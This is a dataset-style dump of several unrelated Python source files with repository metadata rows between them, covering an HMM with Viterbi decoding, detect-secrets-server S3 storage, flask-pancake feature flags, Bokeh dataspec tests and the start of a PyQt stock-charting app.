hss = y[ss:se] # hidden state sequence
for ob, hs in zip(obs, hss):
self.emission_prob_[hs, ob] += 1
for hs1, hs2 in zip(hss[:-1], hss[1:]):
self.transition_prob_[hs1, hs2] += 1
self.start_prob_ /= np.sum(self.start_prob_)
self.emission_prob_ = self.emission_prob_ / np.sum(self.emission_prob_, axis=1)[:, None]
self.transition_prob_ = self.transition_prob_ / np.sum(self.transition_prob_, axis=1)[:, None]
return self
def predict(self, x: np.ndarray):
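        """Viterbi decoding: return the most probable hidden-state sequence for the emission sequence x."""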
paths = np.zeros((x.shape[0], self.n_states), dtype='int')
probs = np.zeros((x.shape[0], self.n_states))
probs[0] = self.start_prob_ * self.emission_prob_[:, x[0]]
for i, ob in enumerate(x[1:]):
p_em = self.emission_prob_[:, ob]
in_p = probs[i] * self.transition_prob_.T
max_in = np.argmax(in_p, axis=1)
out_p = in_p[np.arange(0, self.n_states), max_in]
out_p *= p_em
probs[i+1] = out_p
paths[i+1] = max_in
max_out = np.argmax(probs[-1])
path = [max_out]
for i in reversed(range(1, x.shape[0])):
path.append(paths[i, path[-1]])
return np.array(list(reversed(path)))
def score(self, x: np.ndarray):
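        """Forward pass: probs[i, s] is the joint probability of observing x[:i + 1] and being in state s at step i."""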
probs = np.zeros((x.shape[0], self.n_states))
probs[0] = self.start_prob_ * self.emission_prob_[:, x[0]]
for i, ob in enumerate(x[1:]):
probs[i+1] = (probs[i] @ self.transition_prob_) * self.emission_prob_[:, ob]
return probs
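# Hypothetical usage sketch (names, shapes and data are assumed here, not taken from the project):
#   model = HMM(n_states=12, n_emissions=5000)
#   model.fit(train_emissions, train_states, train_lengths)  # concatenated int arrays plus per-sequence lengths
#   tags = model.predict(test_emissions)                     # Viterbi state sequence for one emission sequence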
| 35.513158
| 103
| 0.580956
|
dc5ab2c5063ac43238ee24f645a151d1d4ab70e8
| 407
|
py
|
Python
|
src/FFEAT/ffeat/flow/__init__.py
|
PatrikValkovic/MasterThesis
|
6e9f3b186541db6c8395ebc96ace7289d01c805b
|
[
"MIT"
] | null | null | null |
src/FFEAT/ffeat/flow/__init__.py
|
PatrikValkovic/MasterThesis
|
6e9f3b186541db6c8395ebc96ace7289d01c805b
|
[
"MIT"
] | null | null | null |
src/FFEAT/ffeat/flow/__init__.py
|
PatrikValkovic/MasterThesis
|
6e9f3b186541db6c8395ebc96ace7289d01c805b
|
[
"MIT"
] | null | null | null |
###############################
#
# Created by Patrik Valkovic
# 3/9/2021
#
###############################
"""
Module implementing classes controlling flow of the algorithm.
"""
from .Lambda import Lambda
from .Select import Select
from .Sequence import Sequence
from .Parallel import Parallel
from .EachArg import EachArg
from .Concat import Concat
from .Repeat import Repeat
from .Replace import Replace
| 22.611111
| 62
| 0.665848
|
1803293cb7139aa137bae64a8995605eb6803c18
| 4,051
|
py
|
Python
|
detect_secrets_server/storage/s3.py
|
ekmixon/detect-secrets-server
|
f2a708fa1a4628a7a93039cae92ef90e8b94d9db
|
[
"Apache-2.0"
] | 110
|
2018-04-13T02:41:40.000Z
|
2021-11-08T10:29:57.000Z
|
detect_secrets_server/storage/s3.py
|
sthagen/detect-secrets-server
|
4e71fa7f551cd1c55803a3fa62145285676fcb50
|
[
"Apache-2.0"
] | 50
|
2018-08-21T10:36:06.000Z
|
2021-04-13T00:42:05.000Z
|
detect_secrets_server/storage/s3.py
|
sthagen/detect-secrets-server
|
4e71fa7f551cd1c55803a3fa62145285676fcb50
|
[
"Apache-2.0"
] | 40
|
2018-07-06T22:03:38.000Z
|
2021-09-09T16:21:32.000Z
|
import os
from .file import FileStorage
from .file import FileStorageWithLocalGit
from detect_secrets_server.core.usage.s3 import should_enable_s3_options
class S3Storage(FileStorage):
"""For file state management, backed to Amazon S3.
See detect_secrets_server.storage.file.FileStorage for the expected
file layout in the S3 bucket.
"""
def __init__(
self,
base_directory,
s3_config
):
super(S3Storage, self).__init__(base_directory)
self.access_key = s3_config['access_key']
self.secret_access_key = s3_config['secret_access_key']
self.bucket_name = s3_config['bucket']
self.prefix = s3_config['prefix']
self._initialize_client()
def get(self, key, force_download=True):
"""Downloads file from S3 into local storage."""
file_on_disk = self.get_tracked_file_location(key)
if force_download or not os.path.exists(file_on_disk):
self.client.download_file(
Bucket=self.bucket_name,
Key=self.get_s3_tracked_file_location(key),
Filename=file_on_disk,
)
return super(S3Storage, self).get(key)
# NOTE: There's no `put` functionality, because S3TrackedRepo handles uploads
# separately. That is, there are cases when you want to store a local
# copy, but not upload it.
def get_tracked_repositories(self):
# Source: https://adamj.eu/tech/2018/01/09/using-boto3-think-pagination/
pages = self.client.get_paginator('list_objects').paginate(
Bucket=self.bucket_name,
Prefix=self.prefix,
)
for page in pages:
for obj in page['Contents']:
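                # strip the bucket prefix and the '.json' extension to recover the tracked repository key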
filename = os.path.splitext(obj['Key'][len(self.prefix):])[0]
if filename.startswith('/'):
filename = filename[1:]
yield (
self.get(filename, force_download=False),
                    # TODO: In its current state, you can't distinguish between
                    # S3StorageWithLocalGit and S3Storage, because there are no
                    # separate paths in S3.
                    #
                    # Therefore, return None so that the results will be
                    # displayed regardless of the user's `--local` flag.
None,
)
def upload(self, key, value):
"""This is different than `put`, to support situations where you
may want to upload locally, but not to be sync'ed with the cloud.
"""
self.client.upload_file(
Filename=self.get_tracked_file_location(key),
Bucket=self.bucket_name,
Key=self.get_s3_tracked_file_location(key),
)
def is_file_uploaded(self, key):
"""Note: that we are using the filename as a prefix, so we will
never run into the 1000 object limit of `list_objects_v2`.
:rtype: bool
"""
filename = self.get_s3_tracked_file_location(key)
response = self.client.list_objects_v2(
Bucket=self.bucket_name,
Prefix=filename,
)
for obj in response.get('Contents', []):
if obj['Key'] == filename:
return bool(obj['Size'])
return False
def _initialize_client(self):
boto3 = self._get_boto3()
if not boto3:
return
self.client = boto3.client(
's3',
aws_access_key_id=self.access_key,
aws_secret_access_key=self.secret_access_key,
)
def _get_boto3(self):
"""Used for mocking purposes."""
if not should_enable_s3_options():
return
import boto3
return boto3
def get_s3_tracked_file_location(self, key):
return os.path.join(
self.prefix,
key + '.json'
)
class S3StorageWithLocalGit(S3Storage, FileStorageWithLocalGit):
pass
| 32.408
| 83
| 0.593434
|
40967919b46da17147530b5852309a783bd2814d
| 387
|
py
|
Python
|
2. Programming Fundamentals With Python (May 2021)/01.Basic Syntax, Conditional Statements and Loops/02_number_definer.py
|
kzborisov/SoftUni
|
ccb2b8850adc79bfb2652a45124c3ff11183412e
|
[
"MIT"
] | 1
|
2021-02-07T07:51:12.000Z
|
2021-02-07T07:51:12.000Z
|
2. Programming Fundamentals With Python (May 2021)/01.Basic Syntax, Conditional Statements and Loops/02_number_definer.py
|
kzborisov/softuni
|
9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751
|
[
"MIT"
] | null | null | null |
2. Programming Fundamentals With Python (May 2021)/01.Basic Syntax, Conditional Statements and Loops/02_number_definer.py
|
kzborisov/softuni
|
9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751
|
[
"MIT"
] | null | null | null |
# Task 02. Number Definer
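# 'small' means an absolute value below 1, 'large' means above 1,000,000; anything else is plain positive/negative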
num = float(input())
if num == 0:
result = 'zero'
elif num > 0:
result = 'positive'
if num < 1:
result = 'small ' + result
elif num > 1000000:
result = 'large ' + result
else:
result = 'negative'
if num > -1:
result = 'small ' + result
elif num < -1000000:
result = 'large ' + result
print(result)
| 18.428571
| 34
| 0.534884
|
5971a987a5ac227b07dcd247b25cd28bc4908dd0
| 7,046
|
py
|
Python
|
flask_pancake/flags.py
|
NicMul/flask-pancake
|
f3f898e2d7c22581aa892280a793a8bd0396d072
|
[
"MIT"
] | null | null | null |
flask_pancake/flags.py
|
NicMul/flask-pancake
|
f3f898e2d7c22581aa892280a793a8bd0396d072
|
[
"MIT"
] | null | null | null |
flask_pancake/flags.py
|
NicMul/flask-pancake
|
f3f898e2d7c22581aa892280a793a8bd0396d072
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
import abc
import random
from typing import TYPE_CHECKING, Dict, Generic, Optional, Tuple, TypeVar
from cached_property import cached_property
from flask import current_app
from .constants import EXTENSION_NAME, RAW_FALSE, RAW_TRUE
from .registry import registry
if TYPE_CHECKING:
from flask_redis import FlaskRedis
from .extension import FlaskPancake
from .utils import GroupFunc
__all__ = ["Flag", "Sample", "Switch"]
DEFAULT_TYPE = TypeVar("DEFAULT_TYPE")
class AbstractFlag(abc.ABC, Generic[DEFAULT_TYPE]):
name: str
default: DEFAULT_TYPE
extension: str
def __init__(
self, name: str, default: DEFAULT_TYPE, extension: Optional[str] = None
) -> None:
self.name = name
self.set_default(default)
self.extension = extension if extension is not None else EXTENSION_NAME
registry.register(self)
def set_default(self, default: DEFAULT_TYPE) -> None:
self.default = default
@property
def ext(self) -> "FlaskPancake":
return current_app.extensions[self.extension]
@property
def _redis_client(self) -> FlaskRedis:
return current_app.extensions[self.ext.redis_extension_name]
@cached_property
def key(self) -> str:
return f"{self.__class__.__name__.upper()}:{self.extension}:{self.name.upper()}"
@abc.abstractmethod
def is_active(self) -> bool:
raise NotImplementedError # pragma: no cover
def clear(self) -> None:
self._redis_client.delete(self.key)
class BaseFlag(AbstractFlag[bool], abc.ABC):
def set_default(self, default: bool) -> None:
if int(default) not in {0, 1}:
raise ValueError(
f"Default value for {self.__class__.__name__.lower()} {self.name} "
f"must be True or False."
)
super().set_default(default)
def is_active(self) -> bool:
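        # setnx seeds the default on first use; after that the value stored in Redis is authoritative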
self._redis_client.setnx(self.key, int(self.default))
return self._redis_client.get(self.key) == RAW_TRUE
def disable(self) -> None:
self._redis_client.set(self.key, 0)
def enable(self) -> None:
self._redis_client.set(self.key, 1)
class Flag(BaseFlag):
"""
A feature flag.
Flags are active (or not) on a per-request / user basis.
"""
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._keys: Dict[str, Tuple[str, str]] = {}
def _get_group_keys(self, group_id: str) -> Tuple[str, str]:
if group_id in self._keys:
return self._keys[group_id]
if self.ext.group_funcs is None:
raise RuntimeError(
f"No group_funcs defined on FlaskPancake extension '{self.extension}'. "
"If you don't have users or other types of groups in your application "
"and want a global flag to turn things on and off, use a `Switch` "
"instead."
)
if group_id not in self.ext.group_funcs:
raise RuntimeError(
f"Invalid group identifer '{group_id}'. This group doesn't seem to be "
f"registered in the FlaskPancake extension '{self.extension}'."
)
object_key = f"FLAG:{self.extension}:k:{group_id}:{self.name.upper()}"
tracking_key = f"FLAG:{self.extension}:t:{group_id}:{self.name.upper()}"
r = self._keys[group_id] = (object_key, tracking_key)
return r
def _get_object_key(
self, group_id: str, *, func: GroupFunc = None, object_id: str = None
):
object_key_prefix, _ = self._get_group_keys(group_id)
if object_id is None:
if func is None:
func = self.ext.group_funcs[group_id]
object_id = func()
if object_id is None:
return None
return f"{object_key_prefix}:{object_id}"
def is_active(self) -> bool:
if self.ext.group_funcs:
for group_id, func in self.ext.group_funcs.items():
object_key = self._get_object_key(group_id, func=func)
if object_key is not None:
value = self._redis_client.get(object_key)
if value == RAW_TRUE:
return True
elif value == RAW_FALSE:
return False
return super().is_active()
def _track_object(self, group_id: str, object_key: str):
self._redis_client.sadd(self._get_group_keys(group_id)[1], object_key)
def clear_group(self, group_id: str, *, object_id: str = None):
object_key = self._get_object_key(group_id, object_id=object_id)
if object_key is None:
raise RuntimeError(f"Cannot derive identifier for group '{group_id}'")
self._redis_client.delete(object_key)
self._redis_client.srem(self._get_group_keys(group_id)[1], object_key)
def clear_all_group(self, group_id: str) -> None:
_, tracking_key = self._get_group_keys(group_id)
object_keys = self._redis_client.smembers(tracking_key)
if object_keys:
self._redis_client.delete(*object_keys)
self._redis_client.srem(tracking_key, *object_keys)
def disable_group(self, group_id: str, *, object_id: str = None) -> None:
object_key = self._get_object_key(group_id, object_id=object_id)
if object_key is None:
raise RuntimeError(f"Cannot derive identifier for group '{group_id}'")
self._track_object(group_id, object_key)
self._redis_client.set(object_key, 0)
def enable_group(self, group_id: str, *, object_id: str = None) -> None:
object_key = self._get_object_key(group_id, object_id=object_id)
if object_key is None:
raise RuntimeError(f"Cannot derive identifier for group '{group_id}'")
self._track_object(group_id, object_key)
self._redis_client.set(object_key, 1)
class Switch(BaseFlag):
"""
A feature switch.
Switches are active or inactive, globally.
"""
class Sample(AbstractFlag[float]):
"""
A sample of users.
A sample is active some percentage of the time, but is not connected to users
or requests.
"""
def set_default(self, default: float) -> None:
if not (0 <= default <= 100):
raise ValueError(
f"Default value for sample {self.name} must be in the range [0, 100]."
)
super().set_default(default)
def is_active(self) -> bool:
self._redis_client.setnx(self.key, self.default)
value = self._redis_client.get(self.key)
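        # active with probability value/100 on each call, independent of any request or user context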
return random.uniform(0, 100) <= float(value)
# def clear(self) -> None:
# self._redis_client.delete(self.key)
def set(self, value: float) -> None:
if not (0 <= value <= 100):
raise ValueError(
f"Value for sample {self.name} must be in the range [0, 100]."
)
self._redis_client.set(self.key, value)
| 33.712919
| 88
| 0.628726
|
c3ba6b7c8ac00df51c9c7f3205362a667a1dbecc
| 18,982
|
py
|
Python
|
tests/unit/bokeh/core/property/test_dataspec.py
|
timgates42/bokeh
|
fb8b07b838f4d07d520cfe899779a11bc89f3c77
|
[
"BSD-3-Clause"
] | 1
|
2015-01-31T14:42:39.000Z
|
2015-01-31T14:42:39.000Z
|
tests/unit/bokeh/core/property/test_dataspec.py
|
timgates42/bokeh
|
fb8b07b838f4d07d520cfe899779a11bc89f3c77
|
[
"BSD-3-Clause"
] | 1
|
2021-05-12T10:14:45.000Z
|
2021-05-12T10:14:45.000Z
|
tests/unit/bokeh/core/property/test_dataspec.py
|
timgates42/bokeh
|
fb8b07b838f4d07d520cfe899779a11bc89f3c77
|
[
"BSD-3-Clause"
] | 1
|
2021-03-04T05:23:36.000Z
|
2021-03-04T05:23:36.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import datetime
from copy import copy
# External imports
import numpy as np
# Bokeh imports
from bokeh._testing.util.api import verify_all
from bokeh.core.has_props import HasProps
# Module under test
import bokeh.core.property.dataspec as bcpd # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
ALL = (
'AngleSpec',
'ColorSpec',
'DataSpec',
'DataDistanceSpec',
'DistanceSpec',
'expr',
'field',
'FontSizeSpec',
'HatchPatternSpec',
'MarkerSpec',
'NumberSpec',
'ScreenDistanceSpec',
'StringSpec',
'UnitsSpec',
'value',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_strict_dataspec_key_values():
for typ in (bcpd.NumberSpec, bcpd.StringSpec, bcpd.FontSizeSpec, bcpd.ColorSpec, bcpd.DataDistanceSpec, bcpd.ScreenDistanceSpec):
class Foo(HasProps):
x = typ("x")
f = Foo()
with pytest.raises(ValueError):
f.x = dict(field="foo", units="junk")
def test_dataspec_dict_to_serializable():
for typ in (bcpd.NumberSpec, bcpd.StringSpec, bcpd.FontSizeSpec, bcpd.ColorSpec):
class Foo(HasProps):
x = typ("x")
foo = Foo(x=dict(field='foo'))
props = foo.properties_with_values(include_defaults=False)
assert props['x']['field'] == 'foo'
assert props['x'] is not foo.x
class Test_AngleSpec(object):
def test_default_none(self):
class Foo(HasProps):
x = bcpd.AngleSpec(None)
a = Foo()
assert a.x is None
assert a.x_units == 'rad'
a.x = 14
assert a.x == 14
assert a.x_units == 'rad'
def test_autocreate_no_parens(self):
class Foo(HasProps):
x = bcpd.AngleSpec
a = Foo()
assert a.x is None
assert a.x_units == 'rad'
a.x = 14
assert a.x == 14
assert a.x_units == 'rad'
def test_default_value(self):
class Foo(HasProps):
x = bcpd.AngleSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'rad'
def test_setting_dict_sets_units(self):
class Foo(HasProps):
x = bcpd.AngleSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'rad'
a.x = { 'value' : 180, 'units' : 'deg' }
assert a.x == { 'value' : 180 }
assert a.x_units == 'deg'
def test_setting_json_sets_units_keeps_dictness(self):
class Foo(HasProps):
x = bcpd.AngleSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'rad'
a.set_from_json('x', { 'value' : 180, 'units' : 'deg' })
assert a.x == 180
assert a.x_units == 'deg'
def test_setting_dict_does_not_modify_original_dict(self):
class Foo(HasProps):
x = bcpd.AngleSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'rad'
new_value = { 'value' : 180, 'units' : 'deg' }
new_value_copy = copy(new_value)
assert new_value_copy == new_value
a.x = new_value
assert a.x == { 'value' : 180 }
assert a.x_units == 'deg'
assert new_value_copy == new_value
class Test_ColorSpec(object):
def test_field(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
assert f.col == "colorfield"
assert desc.serializable_value(f) == {"field": "colorfield"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
def test_field_default(self):
class Foo(HasProps):
col = bcpd.ColorSpec(default="red")
desc = Foo.__dict__["col"]
f = Foo()
assert f.col == "red"
assert desc.serializable_value(f) == {"value": "red"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
def test_default_tuple(self):
class Foo(HasProps):
col = bcpd.ColorSpec(default=(128, 255, 124))
desc = Foo.__dict__["col"]
f = Foo()
assert f.col == (128, 255, 124)
assert desc.serializable_value(f) == {"value": "rgb(128, 255, 124)"}
def test_fixed_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("gray")
desc = Foo.__dict__["col"]
f = Foo()
assert f.col == "gray"
assert desc.serializable_value(f) == {"value": "gray"}
def test_named_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = "red"
assert f.col == "red"
assert desc.serializable_value(f) == {"value": "red"}
f.col = "forestgreen"
assert f.col == "forestgreen"
assert desc.serializable_value(f) == {"value": "forestgreen"}
def test_case_insensitive_named_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = "RED"
assert f.col == "RED"
assert desc.serializable_value(f) == {"value": "RED"}
f.col = "ForestGreen"
assert f.col == "ForestGreen"
assert desc.serializable_value(f) == {"value": "ForestGreen"}
def test_named_value_set_none(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = None
assert desc.serializable_value(f) == {"value": None}
def test_named_value_unset(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
assert desc.serializable_value(f) == {"field": "colorfield"}
def test_named_color_overriding_default(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = "forestgreen"
assert f.col == "forestgreen"
assert desc.serializable_value(f) == {"value": "forestgreen"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
def test_hex_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = "#FF004A"
assert f.col == "#FF004A"
assert desc.serializable_value(f) == {"value": "#FF004A"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
def test_tuple_value(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = (128, 200, 255)
assert f.col == (128, 200, 255)
assert desc.serializable_value(f) == {"value": "rgb(128, 200, 255)"}
f.col = "myfield"
assert f.col == "myfield"
assert desc.serializable_value(f) == {"field": "myfield"}
f.col = (100, 150, 200, 0.5)
assert f.col == (100, 150, 200, 0.5)
assert desc.serializable_value(f) == {"value": "rgba(100, 150, 200, 0.5)"}
def test_set_dict(self):
class Foo(HasProps):
col = bcpd.ColorSpec("colorfield")
desc = Foo.__dict__["col"]
f = Foo()
f.col = {"field": "myfield"}
assert f.col == {"field": "myfield"}
f.col = "field2"
assert f.col == "field2"
assert desc.serializable_value(f) == {"field": "field2"}
class Test_DataDistanceSpec(object):
def test_basic(self):
assert issubclass(bcpd.DataDistanceSpec, bcpd.UnitsSpec)
class Foo(HasProps):
x = bcpd.DataDistanceSpec("x")
foo = Foo(x=dict(field='foo'))
props = foo.properties_with_values(include_defaults=False)
assert props['x']['units'] == 'data'
assert props['x']['field'] == 'foo'
assert props['x'] is not foo.x
class Test_DistanceSpec(object):
def test_default_none(self):
class Foo(HasProps):
x = bcpd.DistanceSpec(None)
a = Foo()
assert a.x is None
assert a.x_units == 'data'
a.x = 14
assert a.x == 14
assert a.x_units == 'data'
def test_autocreate_no_parens(self):
class Foo(HasProps):
x = bcpd.DistanceSpec
a = Foo()
assert a.x is None
assert a.x_units == 'data'
a.x = 14
assert a.x == 14
assert a.x_units == 'data'
def test_default_value(self):
class Foo(HasProps):
x = bcpd.DistanceSpec(default=14)
a = Foo()
assert a.x == 14
assert a.x_units == 'data'
def test_field_function():
assert bcpd.field("foo") == dict(field="foo")
assert bcpd.field("foo", "junk") == dict(field="foo", transform="junk")
assert bcpd.field("foo", transform="junk") == dict(field="foo", transform="junk")
class Test_FontSizeSpec(object):
def test_font_size_from_string(self):
class Foo(HasProps):
x = bcpd.FontSizeSpec(default=None)
css_units = "%|em|ex|ch|ic|rem|vw|vh|vi|vb|vmin|vmax|cm|mm|q|in|pc|pt|px"
a = Foo()
assert a.x is None
for unit in css_units.split("|"):
v = '10%s' % unit
a.x = v
assert a.x == v
assert a.lookup('x').serializable_value(a) == dict(value=v)
v = '10.2%s' % unit
a.x = v
assert a.x == v
assert a.lookup('x').serializable_value(a) == dict(value=v)
f = '_10%s' % unit
a.x = f
assert a.x == f
assert a.lookup('x').serializable_value(a) == dict(field=f)
f = '_10.2%s' % unit
a.x = f
assert a.x == f
assert a.lookup('x').serializable_value(a) == dict(field=f)
for unit in css_units.upper().split("|"):
v = '10%s' % unit
a.x = v
assert a.x == v
assert a.lookup('x').serializable_value(a) == dict(value=v)
v = '10.2%s' % unit
a.x = v
assert a.x == v
assert a.lookup('x').serializable_value(a) == dict(value=v)
f = '_10%s' % unit
a.x = f
assert a.x == f
assert a.lookup('x').serializable_value(a) == dict(field=f)
f = '_10.2%s' % unit
a.x = f
assert a.x == f
assert a.lookup('x').serializable_value(a) == dict(field=f)
def test_bad_font_size_values(self):
class Foo(HasProps):
x = bcpd.FontSizeSpec(default=None)
a = Foo()
with pytest.raises(ValueError):
a.x = "6"
with pytest.raises(ValueError):
a.x = 6
with pytest.raises(ValueError):
a.x = ""
def test_fields(self):
class Foo(HasProps):
x = bcpd.FontSizeSpec(default=None)
a = Foo()
a.x = "_120"
assert a.x == "_120"
a.x = dict(field="_120")
assert a.x == dict(field="_120")
a.x = "foo"
assert a.x == "foo"
a.x = dict(field="foo")
assert a.x == dict(field="foo")
class Test_NumberSpec(object):
def test_field(self):
class Foo(HasProps):
x = bcpd.NumberSpec("xfield")
f = Foo()
assert f.x == "xfield"
assert Foo.__dict__["x"].serializable_value(f) == {"field": "xfield"}
f.x = "my_x"
assert f.x == "my_x"
assert Foo.__dict__["x"].serializable_value(f) == {"field": "my_x"}
def test_value(self):
class Foo(HasProps):
x = bcpd.NumberSpec("xfield")
f = Foo()
assert f.x == "xfield"
f.x = 12
assert f.x == 12
assert Foo.__dict__["x"].serializable_value(f) == {"value": 12}
f.x = 15
assert f.x == 15
assert Foo.__dict__["x"].serializable_value(f) == {"value": 15}
f.x = dict(value=32)
assert Foo.__dict__["x"].serializable_value(f) == {"value": 32}
f.x = None
assert Foo.__dict__["x"].serializable_value(f) is None
def tests_accepts_timedelta(self):
class Foo(HasProps):
dt = bcpd.NumberSpec("dt", accept_datetime=True)
ndt = bcpd.NumberSpec("ndt", accept_datetime=False)
f = Foo()
f.dt = datetime.timedelta(3, 54)
assert f.dt == 259254000.0
# counts as number.Real out of the box
f.dt = np.timedelta64(3000, "ms")
assert f.dt == np.timedelta64(3000, "ms")
f.ndt = datetime.timedelta(3, 54)
assert f.ndt == 259254000.0
# counts as number.Real out of the box
f.ndt = np.timedelta64(3000, "ms")
assert f.ndt == np.timedelta64(3000, "ms")
def tests_accepts_timedelta_with_pandas(self, pd):
class Foo(HasProps):
dt = bcpd.NumberSpec("dt", accept_datetime=True)
ndt = bcpd.NumberSpec("ndt", accept_datetime=False)
f = Foo()
# counts as number.Real out of the box
f.dt = pd.Timedelta("3000ms")
assert f.dt == 3000.0
f.ndt = pd.Timedelta("3000ms")
assert f.ndt == 3000.0
def test_accepts_datetime(self):
class Foo(HasProps):
dt = bcpd.NumberSpec("dt", accept_datetime=True)
ndt = bcpd.NumberSpec("ndt", accept_datetime=False)
f = Foo()
f.dt = datetime.datetime(2016, 5, 11)
assert f.dt == 1462924800000.0
f.dt = datetime.date(2016, 5, 11)
assert f.dt == 1462924800000.0
f.dt = np.datetime64("2016-05-11")
assert f.dt == 1462924800000.0
with pytest.raises(ValueError):
f.ndt = datetime.datetime(2016, 5, 11)
with pytest.raises(ValueError):
f.ndt = datetime.date(2016, 5, 11)
with pytest.raises(ValueError):
f.ndt = np.datetime64("2016-05-11")
def test_default(self):
class Foo(HasProps):
y = bcpd.NumberSpec(default=12)
f = Foo()
assert f.y == 12
assert Foo.__dict__["y"].serializable_value(f) == {"value": 12}
f.y = "y1"
assert f.y == "y1"
# Once we set a concrete value, the default is ignored, because it is unused
f.y = 32
assert f.y == 32
assert Foo.__dict__["y"].serializable_value(f) == {"value": 32}
def test_multiple_instances(self):
class Foo(HasProps):
x = bcpd.NumberSpec("xfield")
a = Foo()
b = Foo()
a.x = 13
b.x = 14
assert a.x == 13
assert b.x == 14
assert Foo.__dict__["x"].serializable_value(a) == {"value": 13}
assert Foo.__dict__["x"].serializable_value(b) == {"value": 14}
b.x = {"field": "x3"}
assert Foo.__dict__["x"].serializable_value(a) == {"value": 13}
assert Foo.__dict__["x"].serializable_value(b) == {"field": "x3"}
def test_autocreate_no_parens(self):
class Foo(HasProps):
x = bcpd.NumberSpec
a = Foo()
assert a.x is None
a.x = 14
assert a.x == 14
def test_set_from_json_keeps_mode(self):
class Foo(HasProps):
x = bcpd.NumberSpec(default=None)
a = Foo()
assert a.x is None
# set as a value
a.x = 14
assert a.x == 14
# set_from_json keeps the previous dict-ness or lack thereof
a.set_from_json('x', dict(value=16))
assert a.x == 16
# but regular assignment overwrites the previous dict-ness
a.x = dict(value=17)
assert a.x == dict(value=17)
# set as a field
a.x = "bar"
assert a.x == "bar"
# set_from_json keeps the previous dict-ness or lack thereof
a.set_from_json('x', dict(field="foo"))
assert a.x == "foo"
# but regular assignment overwrites the previous dict-ness
a.x = dict(field="baz")
assert a.x == dict(field="baz")
class Test_UnitSpec(object):
def test_basic(self):
assert issubclass(bcpd.ScreenDistanceSpec, bcpd.UnitsSpec)
class Foo(HasProps):
x = bcpd.ScreenDistanceSpec("x")
foo = Foo(x=dict(field='foo'))
props = foo.properties_with_values(include_defaults=False)
assert props['x']['units'] == 'screen'
assert props['x']['field'] == 'foo'
assert props['x'] is not foo.x
def test_strict_key_values(self):
class FooUnits(HasProps):
x = bcpd.DistanceSpec("x")
f = FooUnits()
f.x = dict(field="foo", units="screen")
with pytest.raises(ValueError):
f.x = dict(field="foo", units="junk", foo="crap")
class FooUnits(HasProps):
x = bcpd.AngleSpec("x")
f = FooUnits()
f.x = dict(field="foo", units="deg")
with pytest.raises(ValueError):
f.x = dict(field="foo", units="junk", foo="crap")
def test_value_function():
assert bcpd.value("foo") == dict(value="foo")
assert bcpd.value("foo", "junk") == dict(value="foo", transform="junk")
assert bcpd.value("foo", transform="junk") == dict(value="foo", transform="junk")
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
Test___all__ = verify_all(bcpd, ALL)
| 30.517685
| 133
| 0.513961
|
14246c0db8a46e55191fe8b4f8c495d953645b12
| 15,529
|
py
|
Python
|
Tuchart/main.py
|
zhy0313/TuChart
|
23116c5ac876b11e3434ef67064613dc977dd4c4
|
[
"MIT"
] | 1
|
2019-03-20T08:27:22.000Z
|
2019-03-20T08:27:22.000Z
|
build/lib/Tuchart/main.py
|
fasiondog/TuChart
|
23116c5ac876b11e3434ef67064613dc977dd4c4
|
[
"MIT"
] | null | null | null |
build/lib/Tuchart/main.py
|
fasiondog/TuChart
|
23116c5ac876b11e3434ef67064613dc977dd4c4
|
[
"MIT"
] | 3
|
2017-11-27T06:01:57.000Z
|
2019-03-21T14:53:14.000Z
|
#-*- coding:utf-8 -*-
from __future__ import print_function
import os,sys,sip,time
from datetime import datetime,timedelta
from qtpy.QtWidgets import QTreeWidgetItem,QMenu,QApplication,QAction,QMainWindow
from qtpy import QtGui,QtWidgets
from qtpy.QtCore import Qt,QUrl,QDate
from Graph import graphpage
from layout import Ui_MainWindow
from pandas import DataFrame as df
import pandas as pd
import tushare as ts
import cPickle
import json
list1 = []
class MyUi(QMainWindow):
def __init__(self):
super(MyUi, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
cwd = os.getcwd()
cwd = str(cwd)
if os.path.isfile(cwd+"/time"):
with open("time","r") as outfile:#reads current time
history = cPickle.load(outfile)
